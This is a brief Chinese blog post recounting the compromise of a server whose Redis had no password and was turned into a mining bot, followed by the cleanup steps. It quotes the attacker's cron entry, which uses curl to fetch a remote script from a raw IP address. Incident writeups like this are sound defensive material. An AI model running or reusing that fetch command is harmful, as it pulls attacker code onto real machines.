记服务器被黑客攻击事件(肉鸡)
2019年1月15日 早 在服务器上安装了 Redis 未设置密码 项目中配置地址后访问OK
2019年1月15日 下午 阿里客服小姐姐 发来慰问电,问我对他们的服务器是否满意,我狠狠的批评了他们,服务质量太差了,一点都不爽
2019年1月16日 凌晨 阿里云邮件告知我的服务器在对外攻击 对我的某些端口进行了暂时关闭
2019年1月16日 早 阿里云又发送了好几封邮件通知我服务器一直在对外攻击...
劳资还有活要干OK...
2019年1月16日 中午 牺牲午休时间 纠缠度年千百次终于她从了我,秘籍到手,世界我有。
经鉴定,服务器被黑客攻击,并植入肉鸡 我的服务器就成了黑总的挖矿苦力了
秘籍告诉我 我应该稳住 稳住 稳住
1.查看计划任务 crontab -l
发现的确有一个
curl -fsSL http://132.148.241.138:8000/i.sh
2.分析计划任务 curl -fsSL http://132.148.241.138:8000/i.sh
发现该计划任务新建了两个文件夹
3.删除计划任务 crontab -r 删除其创建的文件夹
4.top 查看进程 (这一步应该是最早执行的) 观察多次后你会发现可以的进程名 trust me ! If you look at top five 分钟 ,you will find these.
5.kill -9 可疑进程
6.删除 /tmp 目录下的可疑文件,就是第4步发现的那俩东东
完美
恢复正常了,真好
转载于:https://www.cnblogs.com/zhaiyt/p/10276578.html
记服务器被黑客攻击事件(肉鸡)相关推荐
- 记一次服务器被黑客攻击(暴力破解密码)的记录
文章目录 说明: 1.我是怎么发现的呐? 2.开始弥补我的过错 ①.查看阿里云 ②.重置服务器+修改密码 ③.修改安全组 3.感谢这次黑客的入侵 说明: 其实我没有想过我的服务器被黑客攻击,直到我今天 ...
- 进程与服务的签名_服务器被黑客攻击后如何查找溯源攻击
服务器被黑客攻击后如何查找溯源攻击 现在国内互联网环境复杂,网络攻击事件频发,大部分互联网企业都有被网络攻击的经历.当互联网公司遭到网络攻击时,直接导致在线业务瘫痪,给企业造成巨大的经济损失.小蚁安全 ...
- 外媒评选过去25年10大黑客攻击事件
据国外媒体报道,美国新闻网站The Daily Beast日前评选出了过去25年中10大最具破坏性的黑客攻击事件.上周由一群匿名黑客进行的无休止的网络攻击,为众多政府和企业的网络管理员带来了恐慌.上周 ...
- 尤金·卡巴斯基:卡巴斯基实验室调查内网遭黑客攻击事件
猫宁!!! 尤金·卡巴斯基介绍: 尤金·卡巴斯基出生于黑海沿岸的新罗西斯克,父亲担任工程师,母亲是书库管理员.母亲常买许多数学杂志供其阅读.他在16岁就跳级进入密码.电信与计算机科学学院就读,从198 ...
- EOS Dapps已成黑客攻击事件
导读:本文盘点了近期EOS Dapps上影响较大的安全事件以及漏洞解读,同时以开发者的角度对EOS生态和"Code is Law"进行点评,严格执行Code is law,会增加用 ...
- 4月17日黑客攻击事件简讯
4月17日黑客攻击事件简讯 内蒙古赤峰林西委组织部 - www.lxxdj.gov.cn 快照:http://www.hack-cn.com/view/41443 甘肃崇信公安局 - www.cxga ...
- 史上最大规模黑客攻击事件曝光,数百万人的个人信息遭到泄露
最近一次史无前例的黑客攻击事件,令全球亿万人的个人信息遭到泄露.据报道,黑客组织 "暗影卫士" 攻击了全球最大的云计算服务提供商之一,窃取了该公司几百万用户的个人信息,包括姓名.电 ...
- 关于Snapchat应用被黑客攻击事件
本文讲的是 : 关于Snapchat应用被黑客攻击事件 , napchat是一款由斯坦福大学两位学生开发的一款"阅后即焚"照片分享应用.利用该应用程序,用户可以拍照.录制视频. ...
- 韩购物网站服务器遭黑客攻击 千万用户信息被泄
据韩媒26日报道,韩国著名购物网站Interpark的服务器遭黑客攻击,1000万以上客户的个人信息被泄漏. 韩国警察厅网络安全局介绍,本月11日发现Interpark服务器于今年5月遭到黑客攻击,1 ...
最新文章
- HTML封装AJAX请求,在请求里面写登录的逻辑 ajax 网络请求 post
- python双下划线用法详解
- SQL Server 索引重建或索引重組
- 并查集 Python实现
- 动态让控件超出屏幕_JAVA浏览器控件JxBrowser v7.5上线!更轻松处理Dynamic Favicons...
- UFLDL 教程学习笔记(三)自编码与稀疏性
- JS收集:限制输入搜索串
- ASIHTTPRequest详解 [经典3]
- 《HTML5触摸界面设计与开发》——1.4 神秘谷,是什么让触摸界面反应灵敏?...
- 处理入参_看看优秀的程序员是如何处理NPE的
- python两个字典合并、相同key值保留_Python两个字典key相同的值组成新字典?
- 获取和使用某些网站的iconfont图标字体
- vsftpd配置文件详细讲解
- MATLAB Simulink工具箱
- VMware Workstation下载及安装
- 扣哒世界发布面向中小学阶段C++信奥课程体系
- Elasticsearch(七) - X-Pack 用户管理
- 1688商品详情API接口(1688商品信息查询接口)
- IBIS建模方法之自己编写IBIS模型文件
- pandas学习笔记1—categories与set_categories